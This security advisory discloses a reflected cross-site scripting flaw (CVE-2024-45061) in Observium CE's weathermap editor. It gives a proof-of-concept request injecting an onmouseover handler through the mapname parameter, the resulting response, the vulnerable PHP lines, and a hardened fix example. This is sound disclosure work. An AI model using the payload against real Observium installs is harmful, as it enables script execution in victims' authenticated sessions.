CVE-2024-45061
A cross-site scripting (XSS) vulnerability exists in the weather map editor functionality of Observium CE 24.4.13528. A specially crafted HTTP request can lead to arbitrary JavaScript code execution. An authenticated user would need to click a malicious link provided by the attacker.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Observium CE 24.4.13528
Observium - https://www.observium.org/
8.7 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
Observium is a web-based network monitoring platform designed for network performance monitoring, infrastructure health management, and alerting. It provides automatic discovery of network devices, and supports a wide range of hardware and software platforms, including routers, switches, servers, and applications.
A reflected cross-site scripting vulnerability exists in the weather map editor. An attacker who supplies a crafted value for the mapname
parameter is able to inject arbitrary JavaScript code into the Observium web page.
To trigger this vulnerability, an attacker needs to make the victim's browser send the following HTTP request (the mapname parameter URL-decodes to XXX" onmouseover=alert(1) "xx):
GET /weathermap.php?mapname=XXX%22%20onmouseover=alert(1)%20%22xx HTTP/1.1
Host: 192.168.0.40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: OBSID=88qksk09eipgc3jshjg6lij9a8; wmeditor=0%3A0%3A0; OBSID=hchgpi1ribgcu2tpnppjusbuu3
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Response
HTTP/1.1 200 OK
Date: Fri, 11 Oct 2024 11:26:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: wmeditor=0%3A0%3A0; expires=Sun, 10-Nov-2024 11:26:59 GMT; Max-Age=2592000
Vary: Accept-Encoding
Content-Length: 34760
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
We can observe the injected code in the page body; the double quote closes the action attribute and the remainder of the value is parsed as new attributes of the form element:
<div class="box box-solid">
<form action="/wmap/mapname=XXX" onmouseover=alert(1) "xx/edit=1/" method="post" name="frmMain">
<div align="center" id="mainarea">
<input type="hidden" name="plug" value="0"/>
<input style="display:none" type="image"
The vulnerable code is located in the following PHP file. $mapname is taken from the request, concatenated into $editor_name, and echoed into a double-quoted HTML attribute without any escaping:
//includes/weathermap/editor.php
Line 104 $editor_name = "/wmap/mapname=" . $mapname . "/edit=1/";
(...)
Line 917 <div class="box box-solid">
Line 919 <form action="<?php echo $editor_name ?>" method="post" name="frmMain">
Line 920 <div align="center" id="mainarea">
By clicking the malicious link, the injected JavaScript code would execute in the context of the authenticated user. With the payload shown above the handler is onmouseover on the main form element, so it fires as soon as the victim's pointer moves over the editor page; no further interaction is required beyond opening the link.
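The following is an added example and is not Observium's code or the vendor's patch. It reproduces the interpolation pattern from editor.php in a self-contained script, feeds it the decoded payload from the request above, and contrasts it with a hardened version. The hardened version is one reasonable fix (allowlist validation of the map name plus attribute-context escaping with htmlspecialchars), not a description of how the vendor actually fixed the issue; the function names render_vulnerable and render_hardened and the allowlist pattern are assumptions made for this example.

```php
<?php
// Added example (not Observium's code): minimal stand-in for the pattern at
// editor.php line 104 / line 919, where $mapname is concatenated into
// $editor_name and echoed raw inside a double-quoted HTML attribute.

// Decoded form of ?mapname=XXX%22%20onmouseover=alert(1)%20%22xx
// (constructed from the advisory's request).
$mapname = 'XXX" onmouseover=alert(1) "xx';

// Vulnerable pattern: a " inside $mapname closes the action attribute and
// everything after it becomes additional attributes on the <form> element.
function render_vulnerable(string $mapname): string
{
    $editor_name = "/wmap/mapname=" . $mapname . "/edit=1/";
    return '<form action="' . $editor_name . '" method="post" name="frmMain">';
}

// Hardened pattern (assumption: one reasonable fix, not the vendor's patch).
// Two independent layers so that a bypass of one does not defeat the other:
//  1. Allowlist: a weather map name never legitimately needs quotes, angle
//     brackets, spaces or slashes, so reject anything outside a narrow set
//     and fall back to a known-good default instead of echoing the input.
//  2. Output encoding for the HTML attribute context: ENT_QUOTES turns both
//     " and ' into entities, so even a value that slipped past validation
//     cannot terminate the attribute.
function render_hardened(string $mapname): string
{
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $mapname)) {
        $mapname = 'default';
    }
    $editor_name = "/wmap/mapname=" . $mapname . "/edit=1/";
    $safe = htmlspecialchars($editor_name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $safe . '" method="post" name="frmMain">';
}

// Escaping alone (no allowlist) for comparison: the quotes are neutralised
// as &quot; and the payload stays inside the attribute value as inert text.
function escape_only(string $mapname): string
{
    $editor_name = "/wmap/mapname=" . $mapname . "/edit=1/";
    return htmlspecialchars($editor_name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

echo "vulnerable: ", render_vulnerable($mapname), PHP_EOL;
echo "hardened:   ", render_hardened($mapname), PHP_EOL;
echo "escaped:    ", escape_only($mapname), PHP_EOL;
```

Running the script with the advisory's payload, render_vulnerable produces exactly the <form action="/wmap/mapname=XXX" onmouseover=alert(1) "xx/edit=1/" ...> tag shown in the response excerpt above, while the hardened output keeps the whole value inside the action attribute. Note that htmlspecialchars without ENT_QUOTES leaves single quotes untouched, which is why the attribute context requires that flag even when the surrounding attribute uses double quotes.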
2024-10-23 - Initial Vendor Contact
2024-10-23 - Vendor Disclosure
2024-12-24 - Vendor Patch Release
2025-01-15 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.